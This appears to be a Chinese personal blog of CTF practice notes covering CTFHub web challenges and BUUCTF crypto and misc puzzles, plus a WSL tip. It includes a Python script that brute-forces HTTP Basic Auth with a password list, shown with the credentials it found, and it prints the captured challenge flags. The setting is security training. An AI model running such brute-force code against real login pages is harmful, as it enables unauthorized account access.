分类 默认分类 下的文章

WSL 切换版本

查看版本号

wsl -l -v

PS C:\Users\dayi> wsl -l -v
  NAME          STATE           VERSION
* Debian        Stopped         2
  kali-linux    Running         1
  
  

切换版本

wsl --set-version Debian 2

PS C:\Users\dayi> wsl -l -v
  NAME      STATE           VERSION
* Debian    Stopped         1
PS C:\Users\dayi> wsl --set-version Debian 2
正在进行转换,这可能需要几分钟时间...
有关与 WSL 2 的主要区别的信息,请访问 https://aka.ms/wsl2
转换完成。
PS C:\Users\dayi> wsl -l -v
  NAME      STATE           VERSION
* Debian    Stopped         2

22.2.2

大年初二

0x01 ctfhub web 请求方式

  1. 是HTTP的各种方法的学习
  2. wp来自互联网
  3. from urllib import request
    
    req = request.Request(method='CTFHUB', url='http://challenge-42fddc686b43e68f.sandbox.ctfhub.com:10800/index.php')
    res = request.urlopen(req)
    print(res.read())

0x02 ctfhub web 302跳转

  1. owo

    [root@oao ~]# curl http://challenge-66684d04baa09987.sandbox.ctfhub.com:10800/index.php
    ctfhub{e083eb87c1eb8f6f4cef2e23}

0x03 ctfhub web Cookie

  1. 用插件Edit this cookie改掉
  2. ctfhub{3d00d90799b8dc1b1d7b87ee}

0x04 ctfhub web 基础认证

  1. 不容易,ctfhub{130b2dd63035026a4958912f}
  2. 代码

    
    
    
    f=open('dic.dic','r',encoding="utf-8")
    arr=f.readlines()
    arr2=[]
    for i in arr:
      arr2.append(i.strip('\n'))
    
    print(arr2)
    
    
    import requests
    import base64
    import time
    
    #import faker #pip install faker
    import asyncio
    def get(str1):
      b64=base64.b64encode(str1.encode())
      try:
        headers = {'Authorization': 'Basic '+b64.decode()}
        r = requests.get(url, headers=headers,timeout=2)
        print(headers['Authorization'])
        print(str(r)+str(r.status_code))
        return r.status_code
      except:
        try:
          headers = {'Authorization': 'Basic '+b64.decode()}
          r = requests.get(url, headers=headers,timeout=2)
          print(headers['Authorization'])
          print(str(r)+str(r.status_code))
          return r.status_code
        except:
          print("oppos")
    
    url="http://challenge-3e6e821e7aab6f8b.sandbox.ctfhub.com:10800/flag.html"
    for i in arr2:
      str1="admin:"+i
      #print(str1)
      
      #print(b64)
      #print("---------------------")
      if get(str1) != 401:
        break
      time.sleep(0.01)
    
    out:
    Basic YWRtaW46ZnVja21l
    <Response [401]>401
    Basic YWRtaW46Njk2OQ==
    <Response [200]>200

22.2.1

0x01 buu crypto 异性相吸

  1. 没有思路,看了看wp
  2. 这个操作真的没想到。
  3. flag{ea1bc0988992276b7f95b54a7435e89e}

0x02 buu misc 面具下的flag

  1. binwalk 进行伪加密
  2. 得到flag.vmdk
  3. +++++ +++++ [->++ +++++ +++<] >++.+ +++++ .<+++ [->-- -<]>- -.+++ +++.<
    ++++[ ->+++ +<]>+ +++.< +++++ +[->- ----- <]>-- ----- --.<+ +++[- >----
    <]>-- ----- .<+++ [->++ +<]>+ +++++ .<+++ +[->- ---<] >-.<+ +++++ [->++
    ++++< ]>+++ +++.< +++++ [->-- ---<] >---- -.+++ .<+++ [->-- -<]>- ----- .<
    
    flag{N7F5_AD5
  4. 这里卡住了,没想到,又是linux文件问题

    7z x flag.vmdk -o./
    cat key_part_two/where_is_flag_part_two.txt:flag_part_two_is_here.txt
    Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
    
    balabal

_i5_funny!}


5. `flag{N7F5_AD5_i5_funny!}`



## 0x03 buu misc 九连环

1. 感觉不妙

2. ```shell
┌──(root?kali)-[/home/kali/Desktop/ouo]
└─# tree _123456cry.jpg.extracted                                                                                                                    127 ⨯ 1 ⚙
_123456cry.jpg.extracted
├── 4C68.zip
└── asd
    ├── good-已合并.jpg
    ├── qwe.zip
    └── _qwe.zip.extracted
        ├── 0.zip
        └── flag.txt

2 directories, 5 files
  1. 再次卡住

    zsteg -a /home/kali/Desktop/ouo/_123456cry.jpg.extracted/asd/good-已合并.jpg
    [!] #<ZPNG::NotSupported: Unsupported header "\xFF\xD8\xFF\xE0\x00\x10JF"
    反正不是png隐写。
  2. WP

    steghide extract -sf good.jpg
    看到这个图片就是压缩包的密码:
    bV1g6t5wZDJif^J7
    
  3. 得到flag

    flag{1RTo8w@&4nK@z*XL}

22.1.31

0x01 buu cryto 权限获得第一步

  1. flag{3617656}

0x02 buu cryto 世上无难事

  1. https://www.quipqiup.com/
  2. 640E11012805F211B0AB24FF02A1ED09
  3. flag{640E11012805F211B0AB24FF02A1ED09}

0x03 buu crypto Unencode

UUencode编码算法

flag{dsdasdsa99877LLLKK}

22.1.30

0x01 buu misc 假如给我三天光明

  1. 盲文对照 KMDONOWG,小写。
  2. 吐了
  3. ..-. .-- .--. . . .. ----- ---.. --... ...-- ..--- ..--.. ..--- ...-- -.. --..
  4. FWPEEI08732?23DZ
  5. flag{FWPEEI08732?23DZ}

0x02 buu misc 另外一个世界

  1. jpg应该无隐写?
  2. 最后有

    01101011011011110110010101101011011010100011001101110011
  3. str1="01101011011011110110010101101011011010100011001101110011"
    
    for i in range(0,len(str1),8):
    
      print(chr(int(str1[i:i+8],2)),end="")
      
  4. flag{koekj3s}

    0x03 buu crypto 凯撒?替换?呵呵!


没有什么思路,但是发现了个网站!

https://www.quipqiup.com/

直接解出来了!

`flag{flagsubstitutioncipherdecryptionisalwayseasyjustlikeapieceofcake}`



提交`flag{substitutioncipherdecryptionisalwayseasyjustlikeapieceofcake}`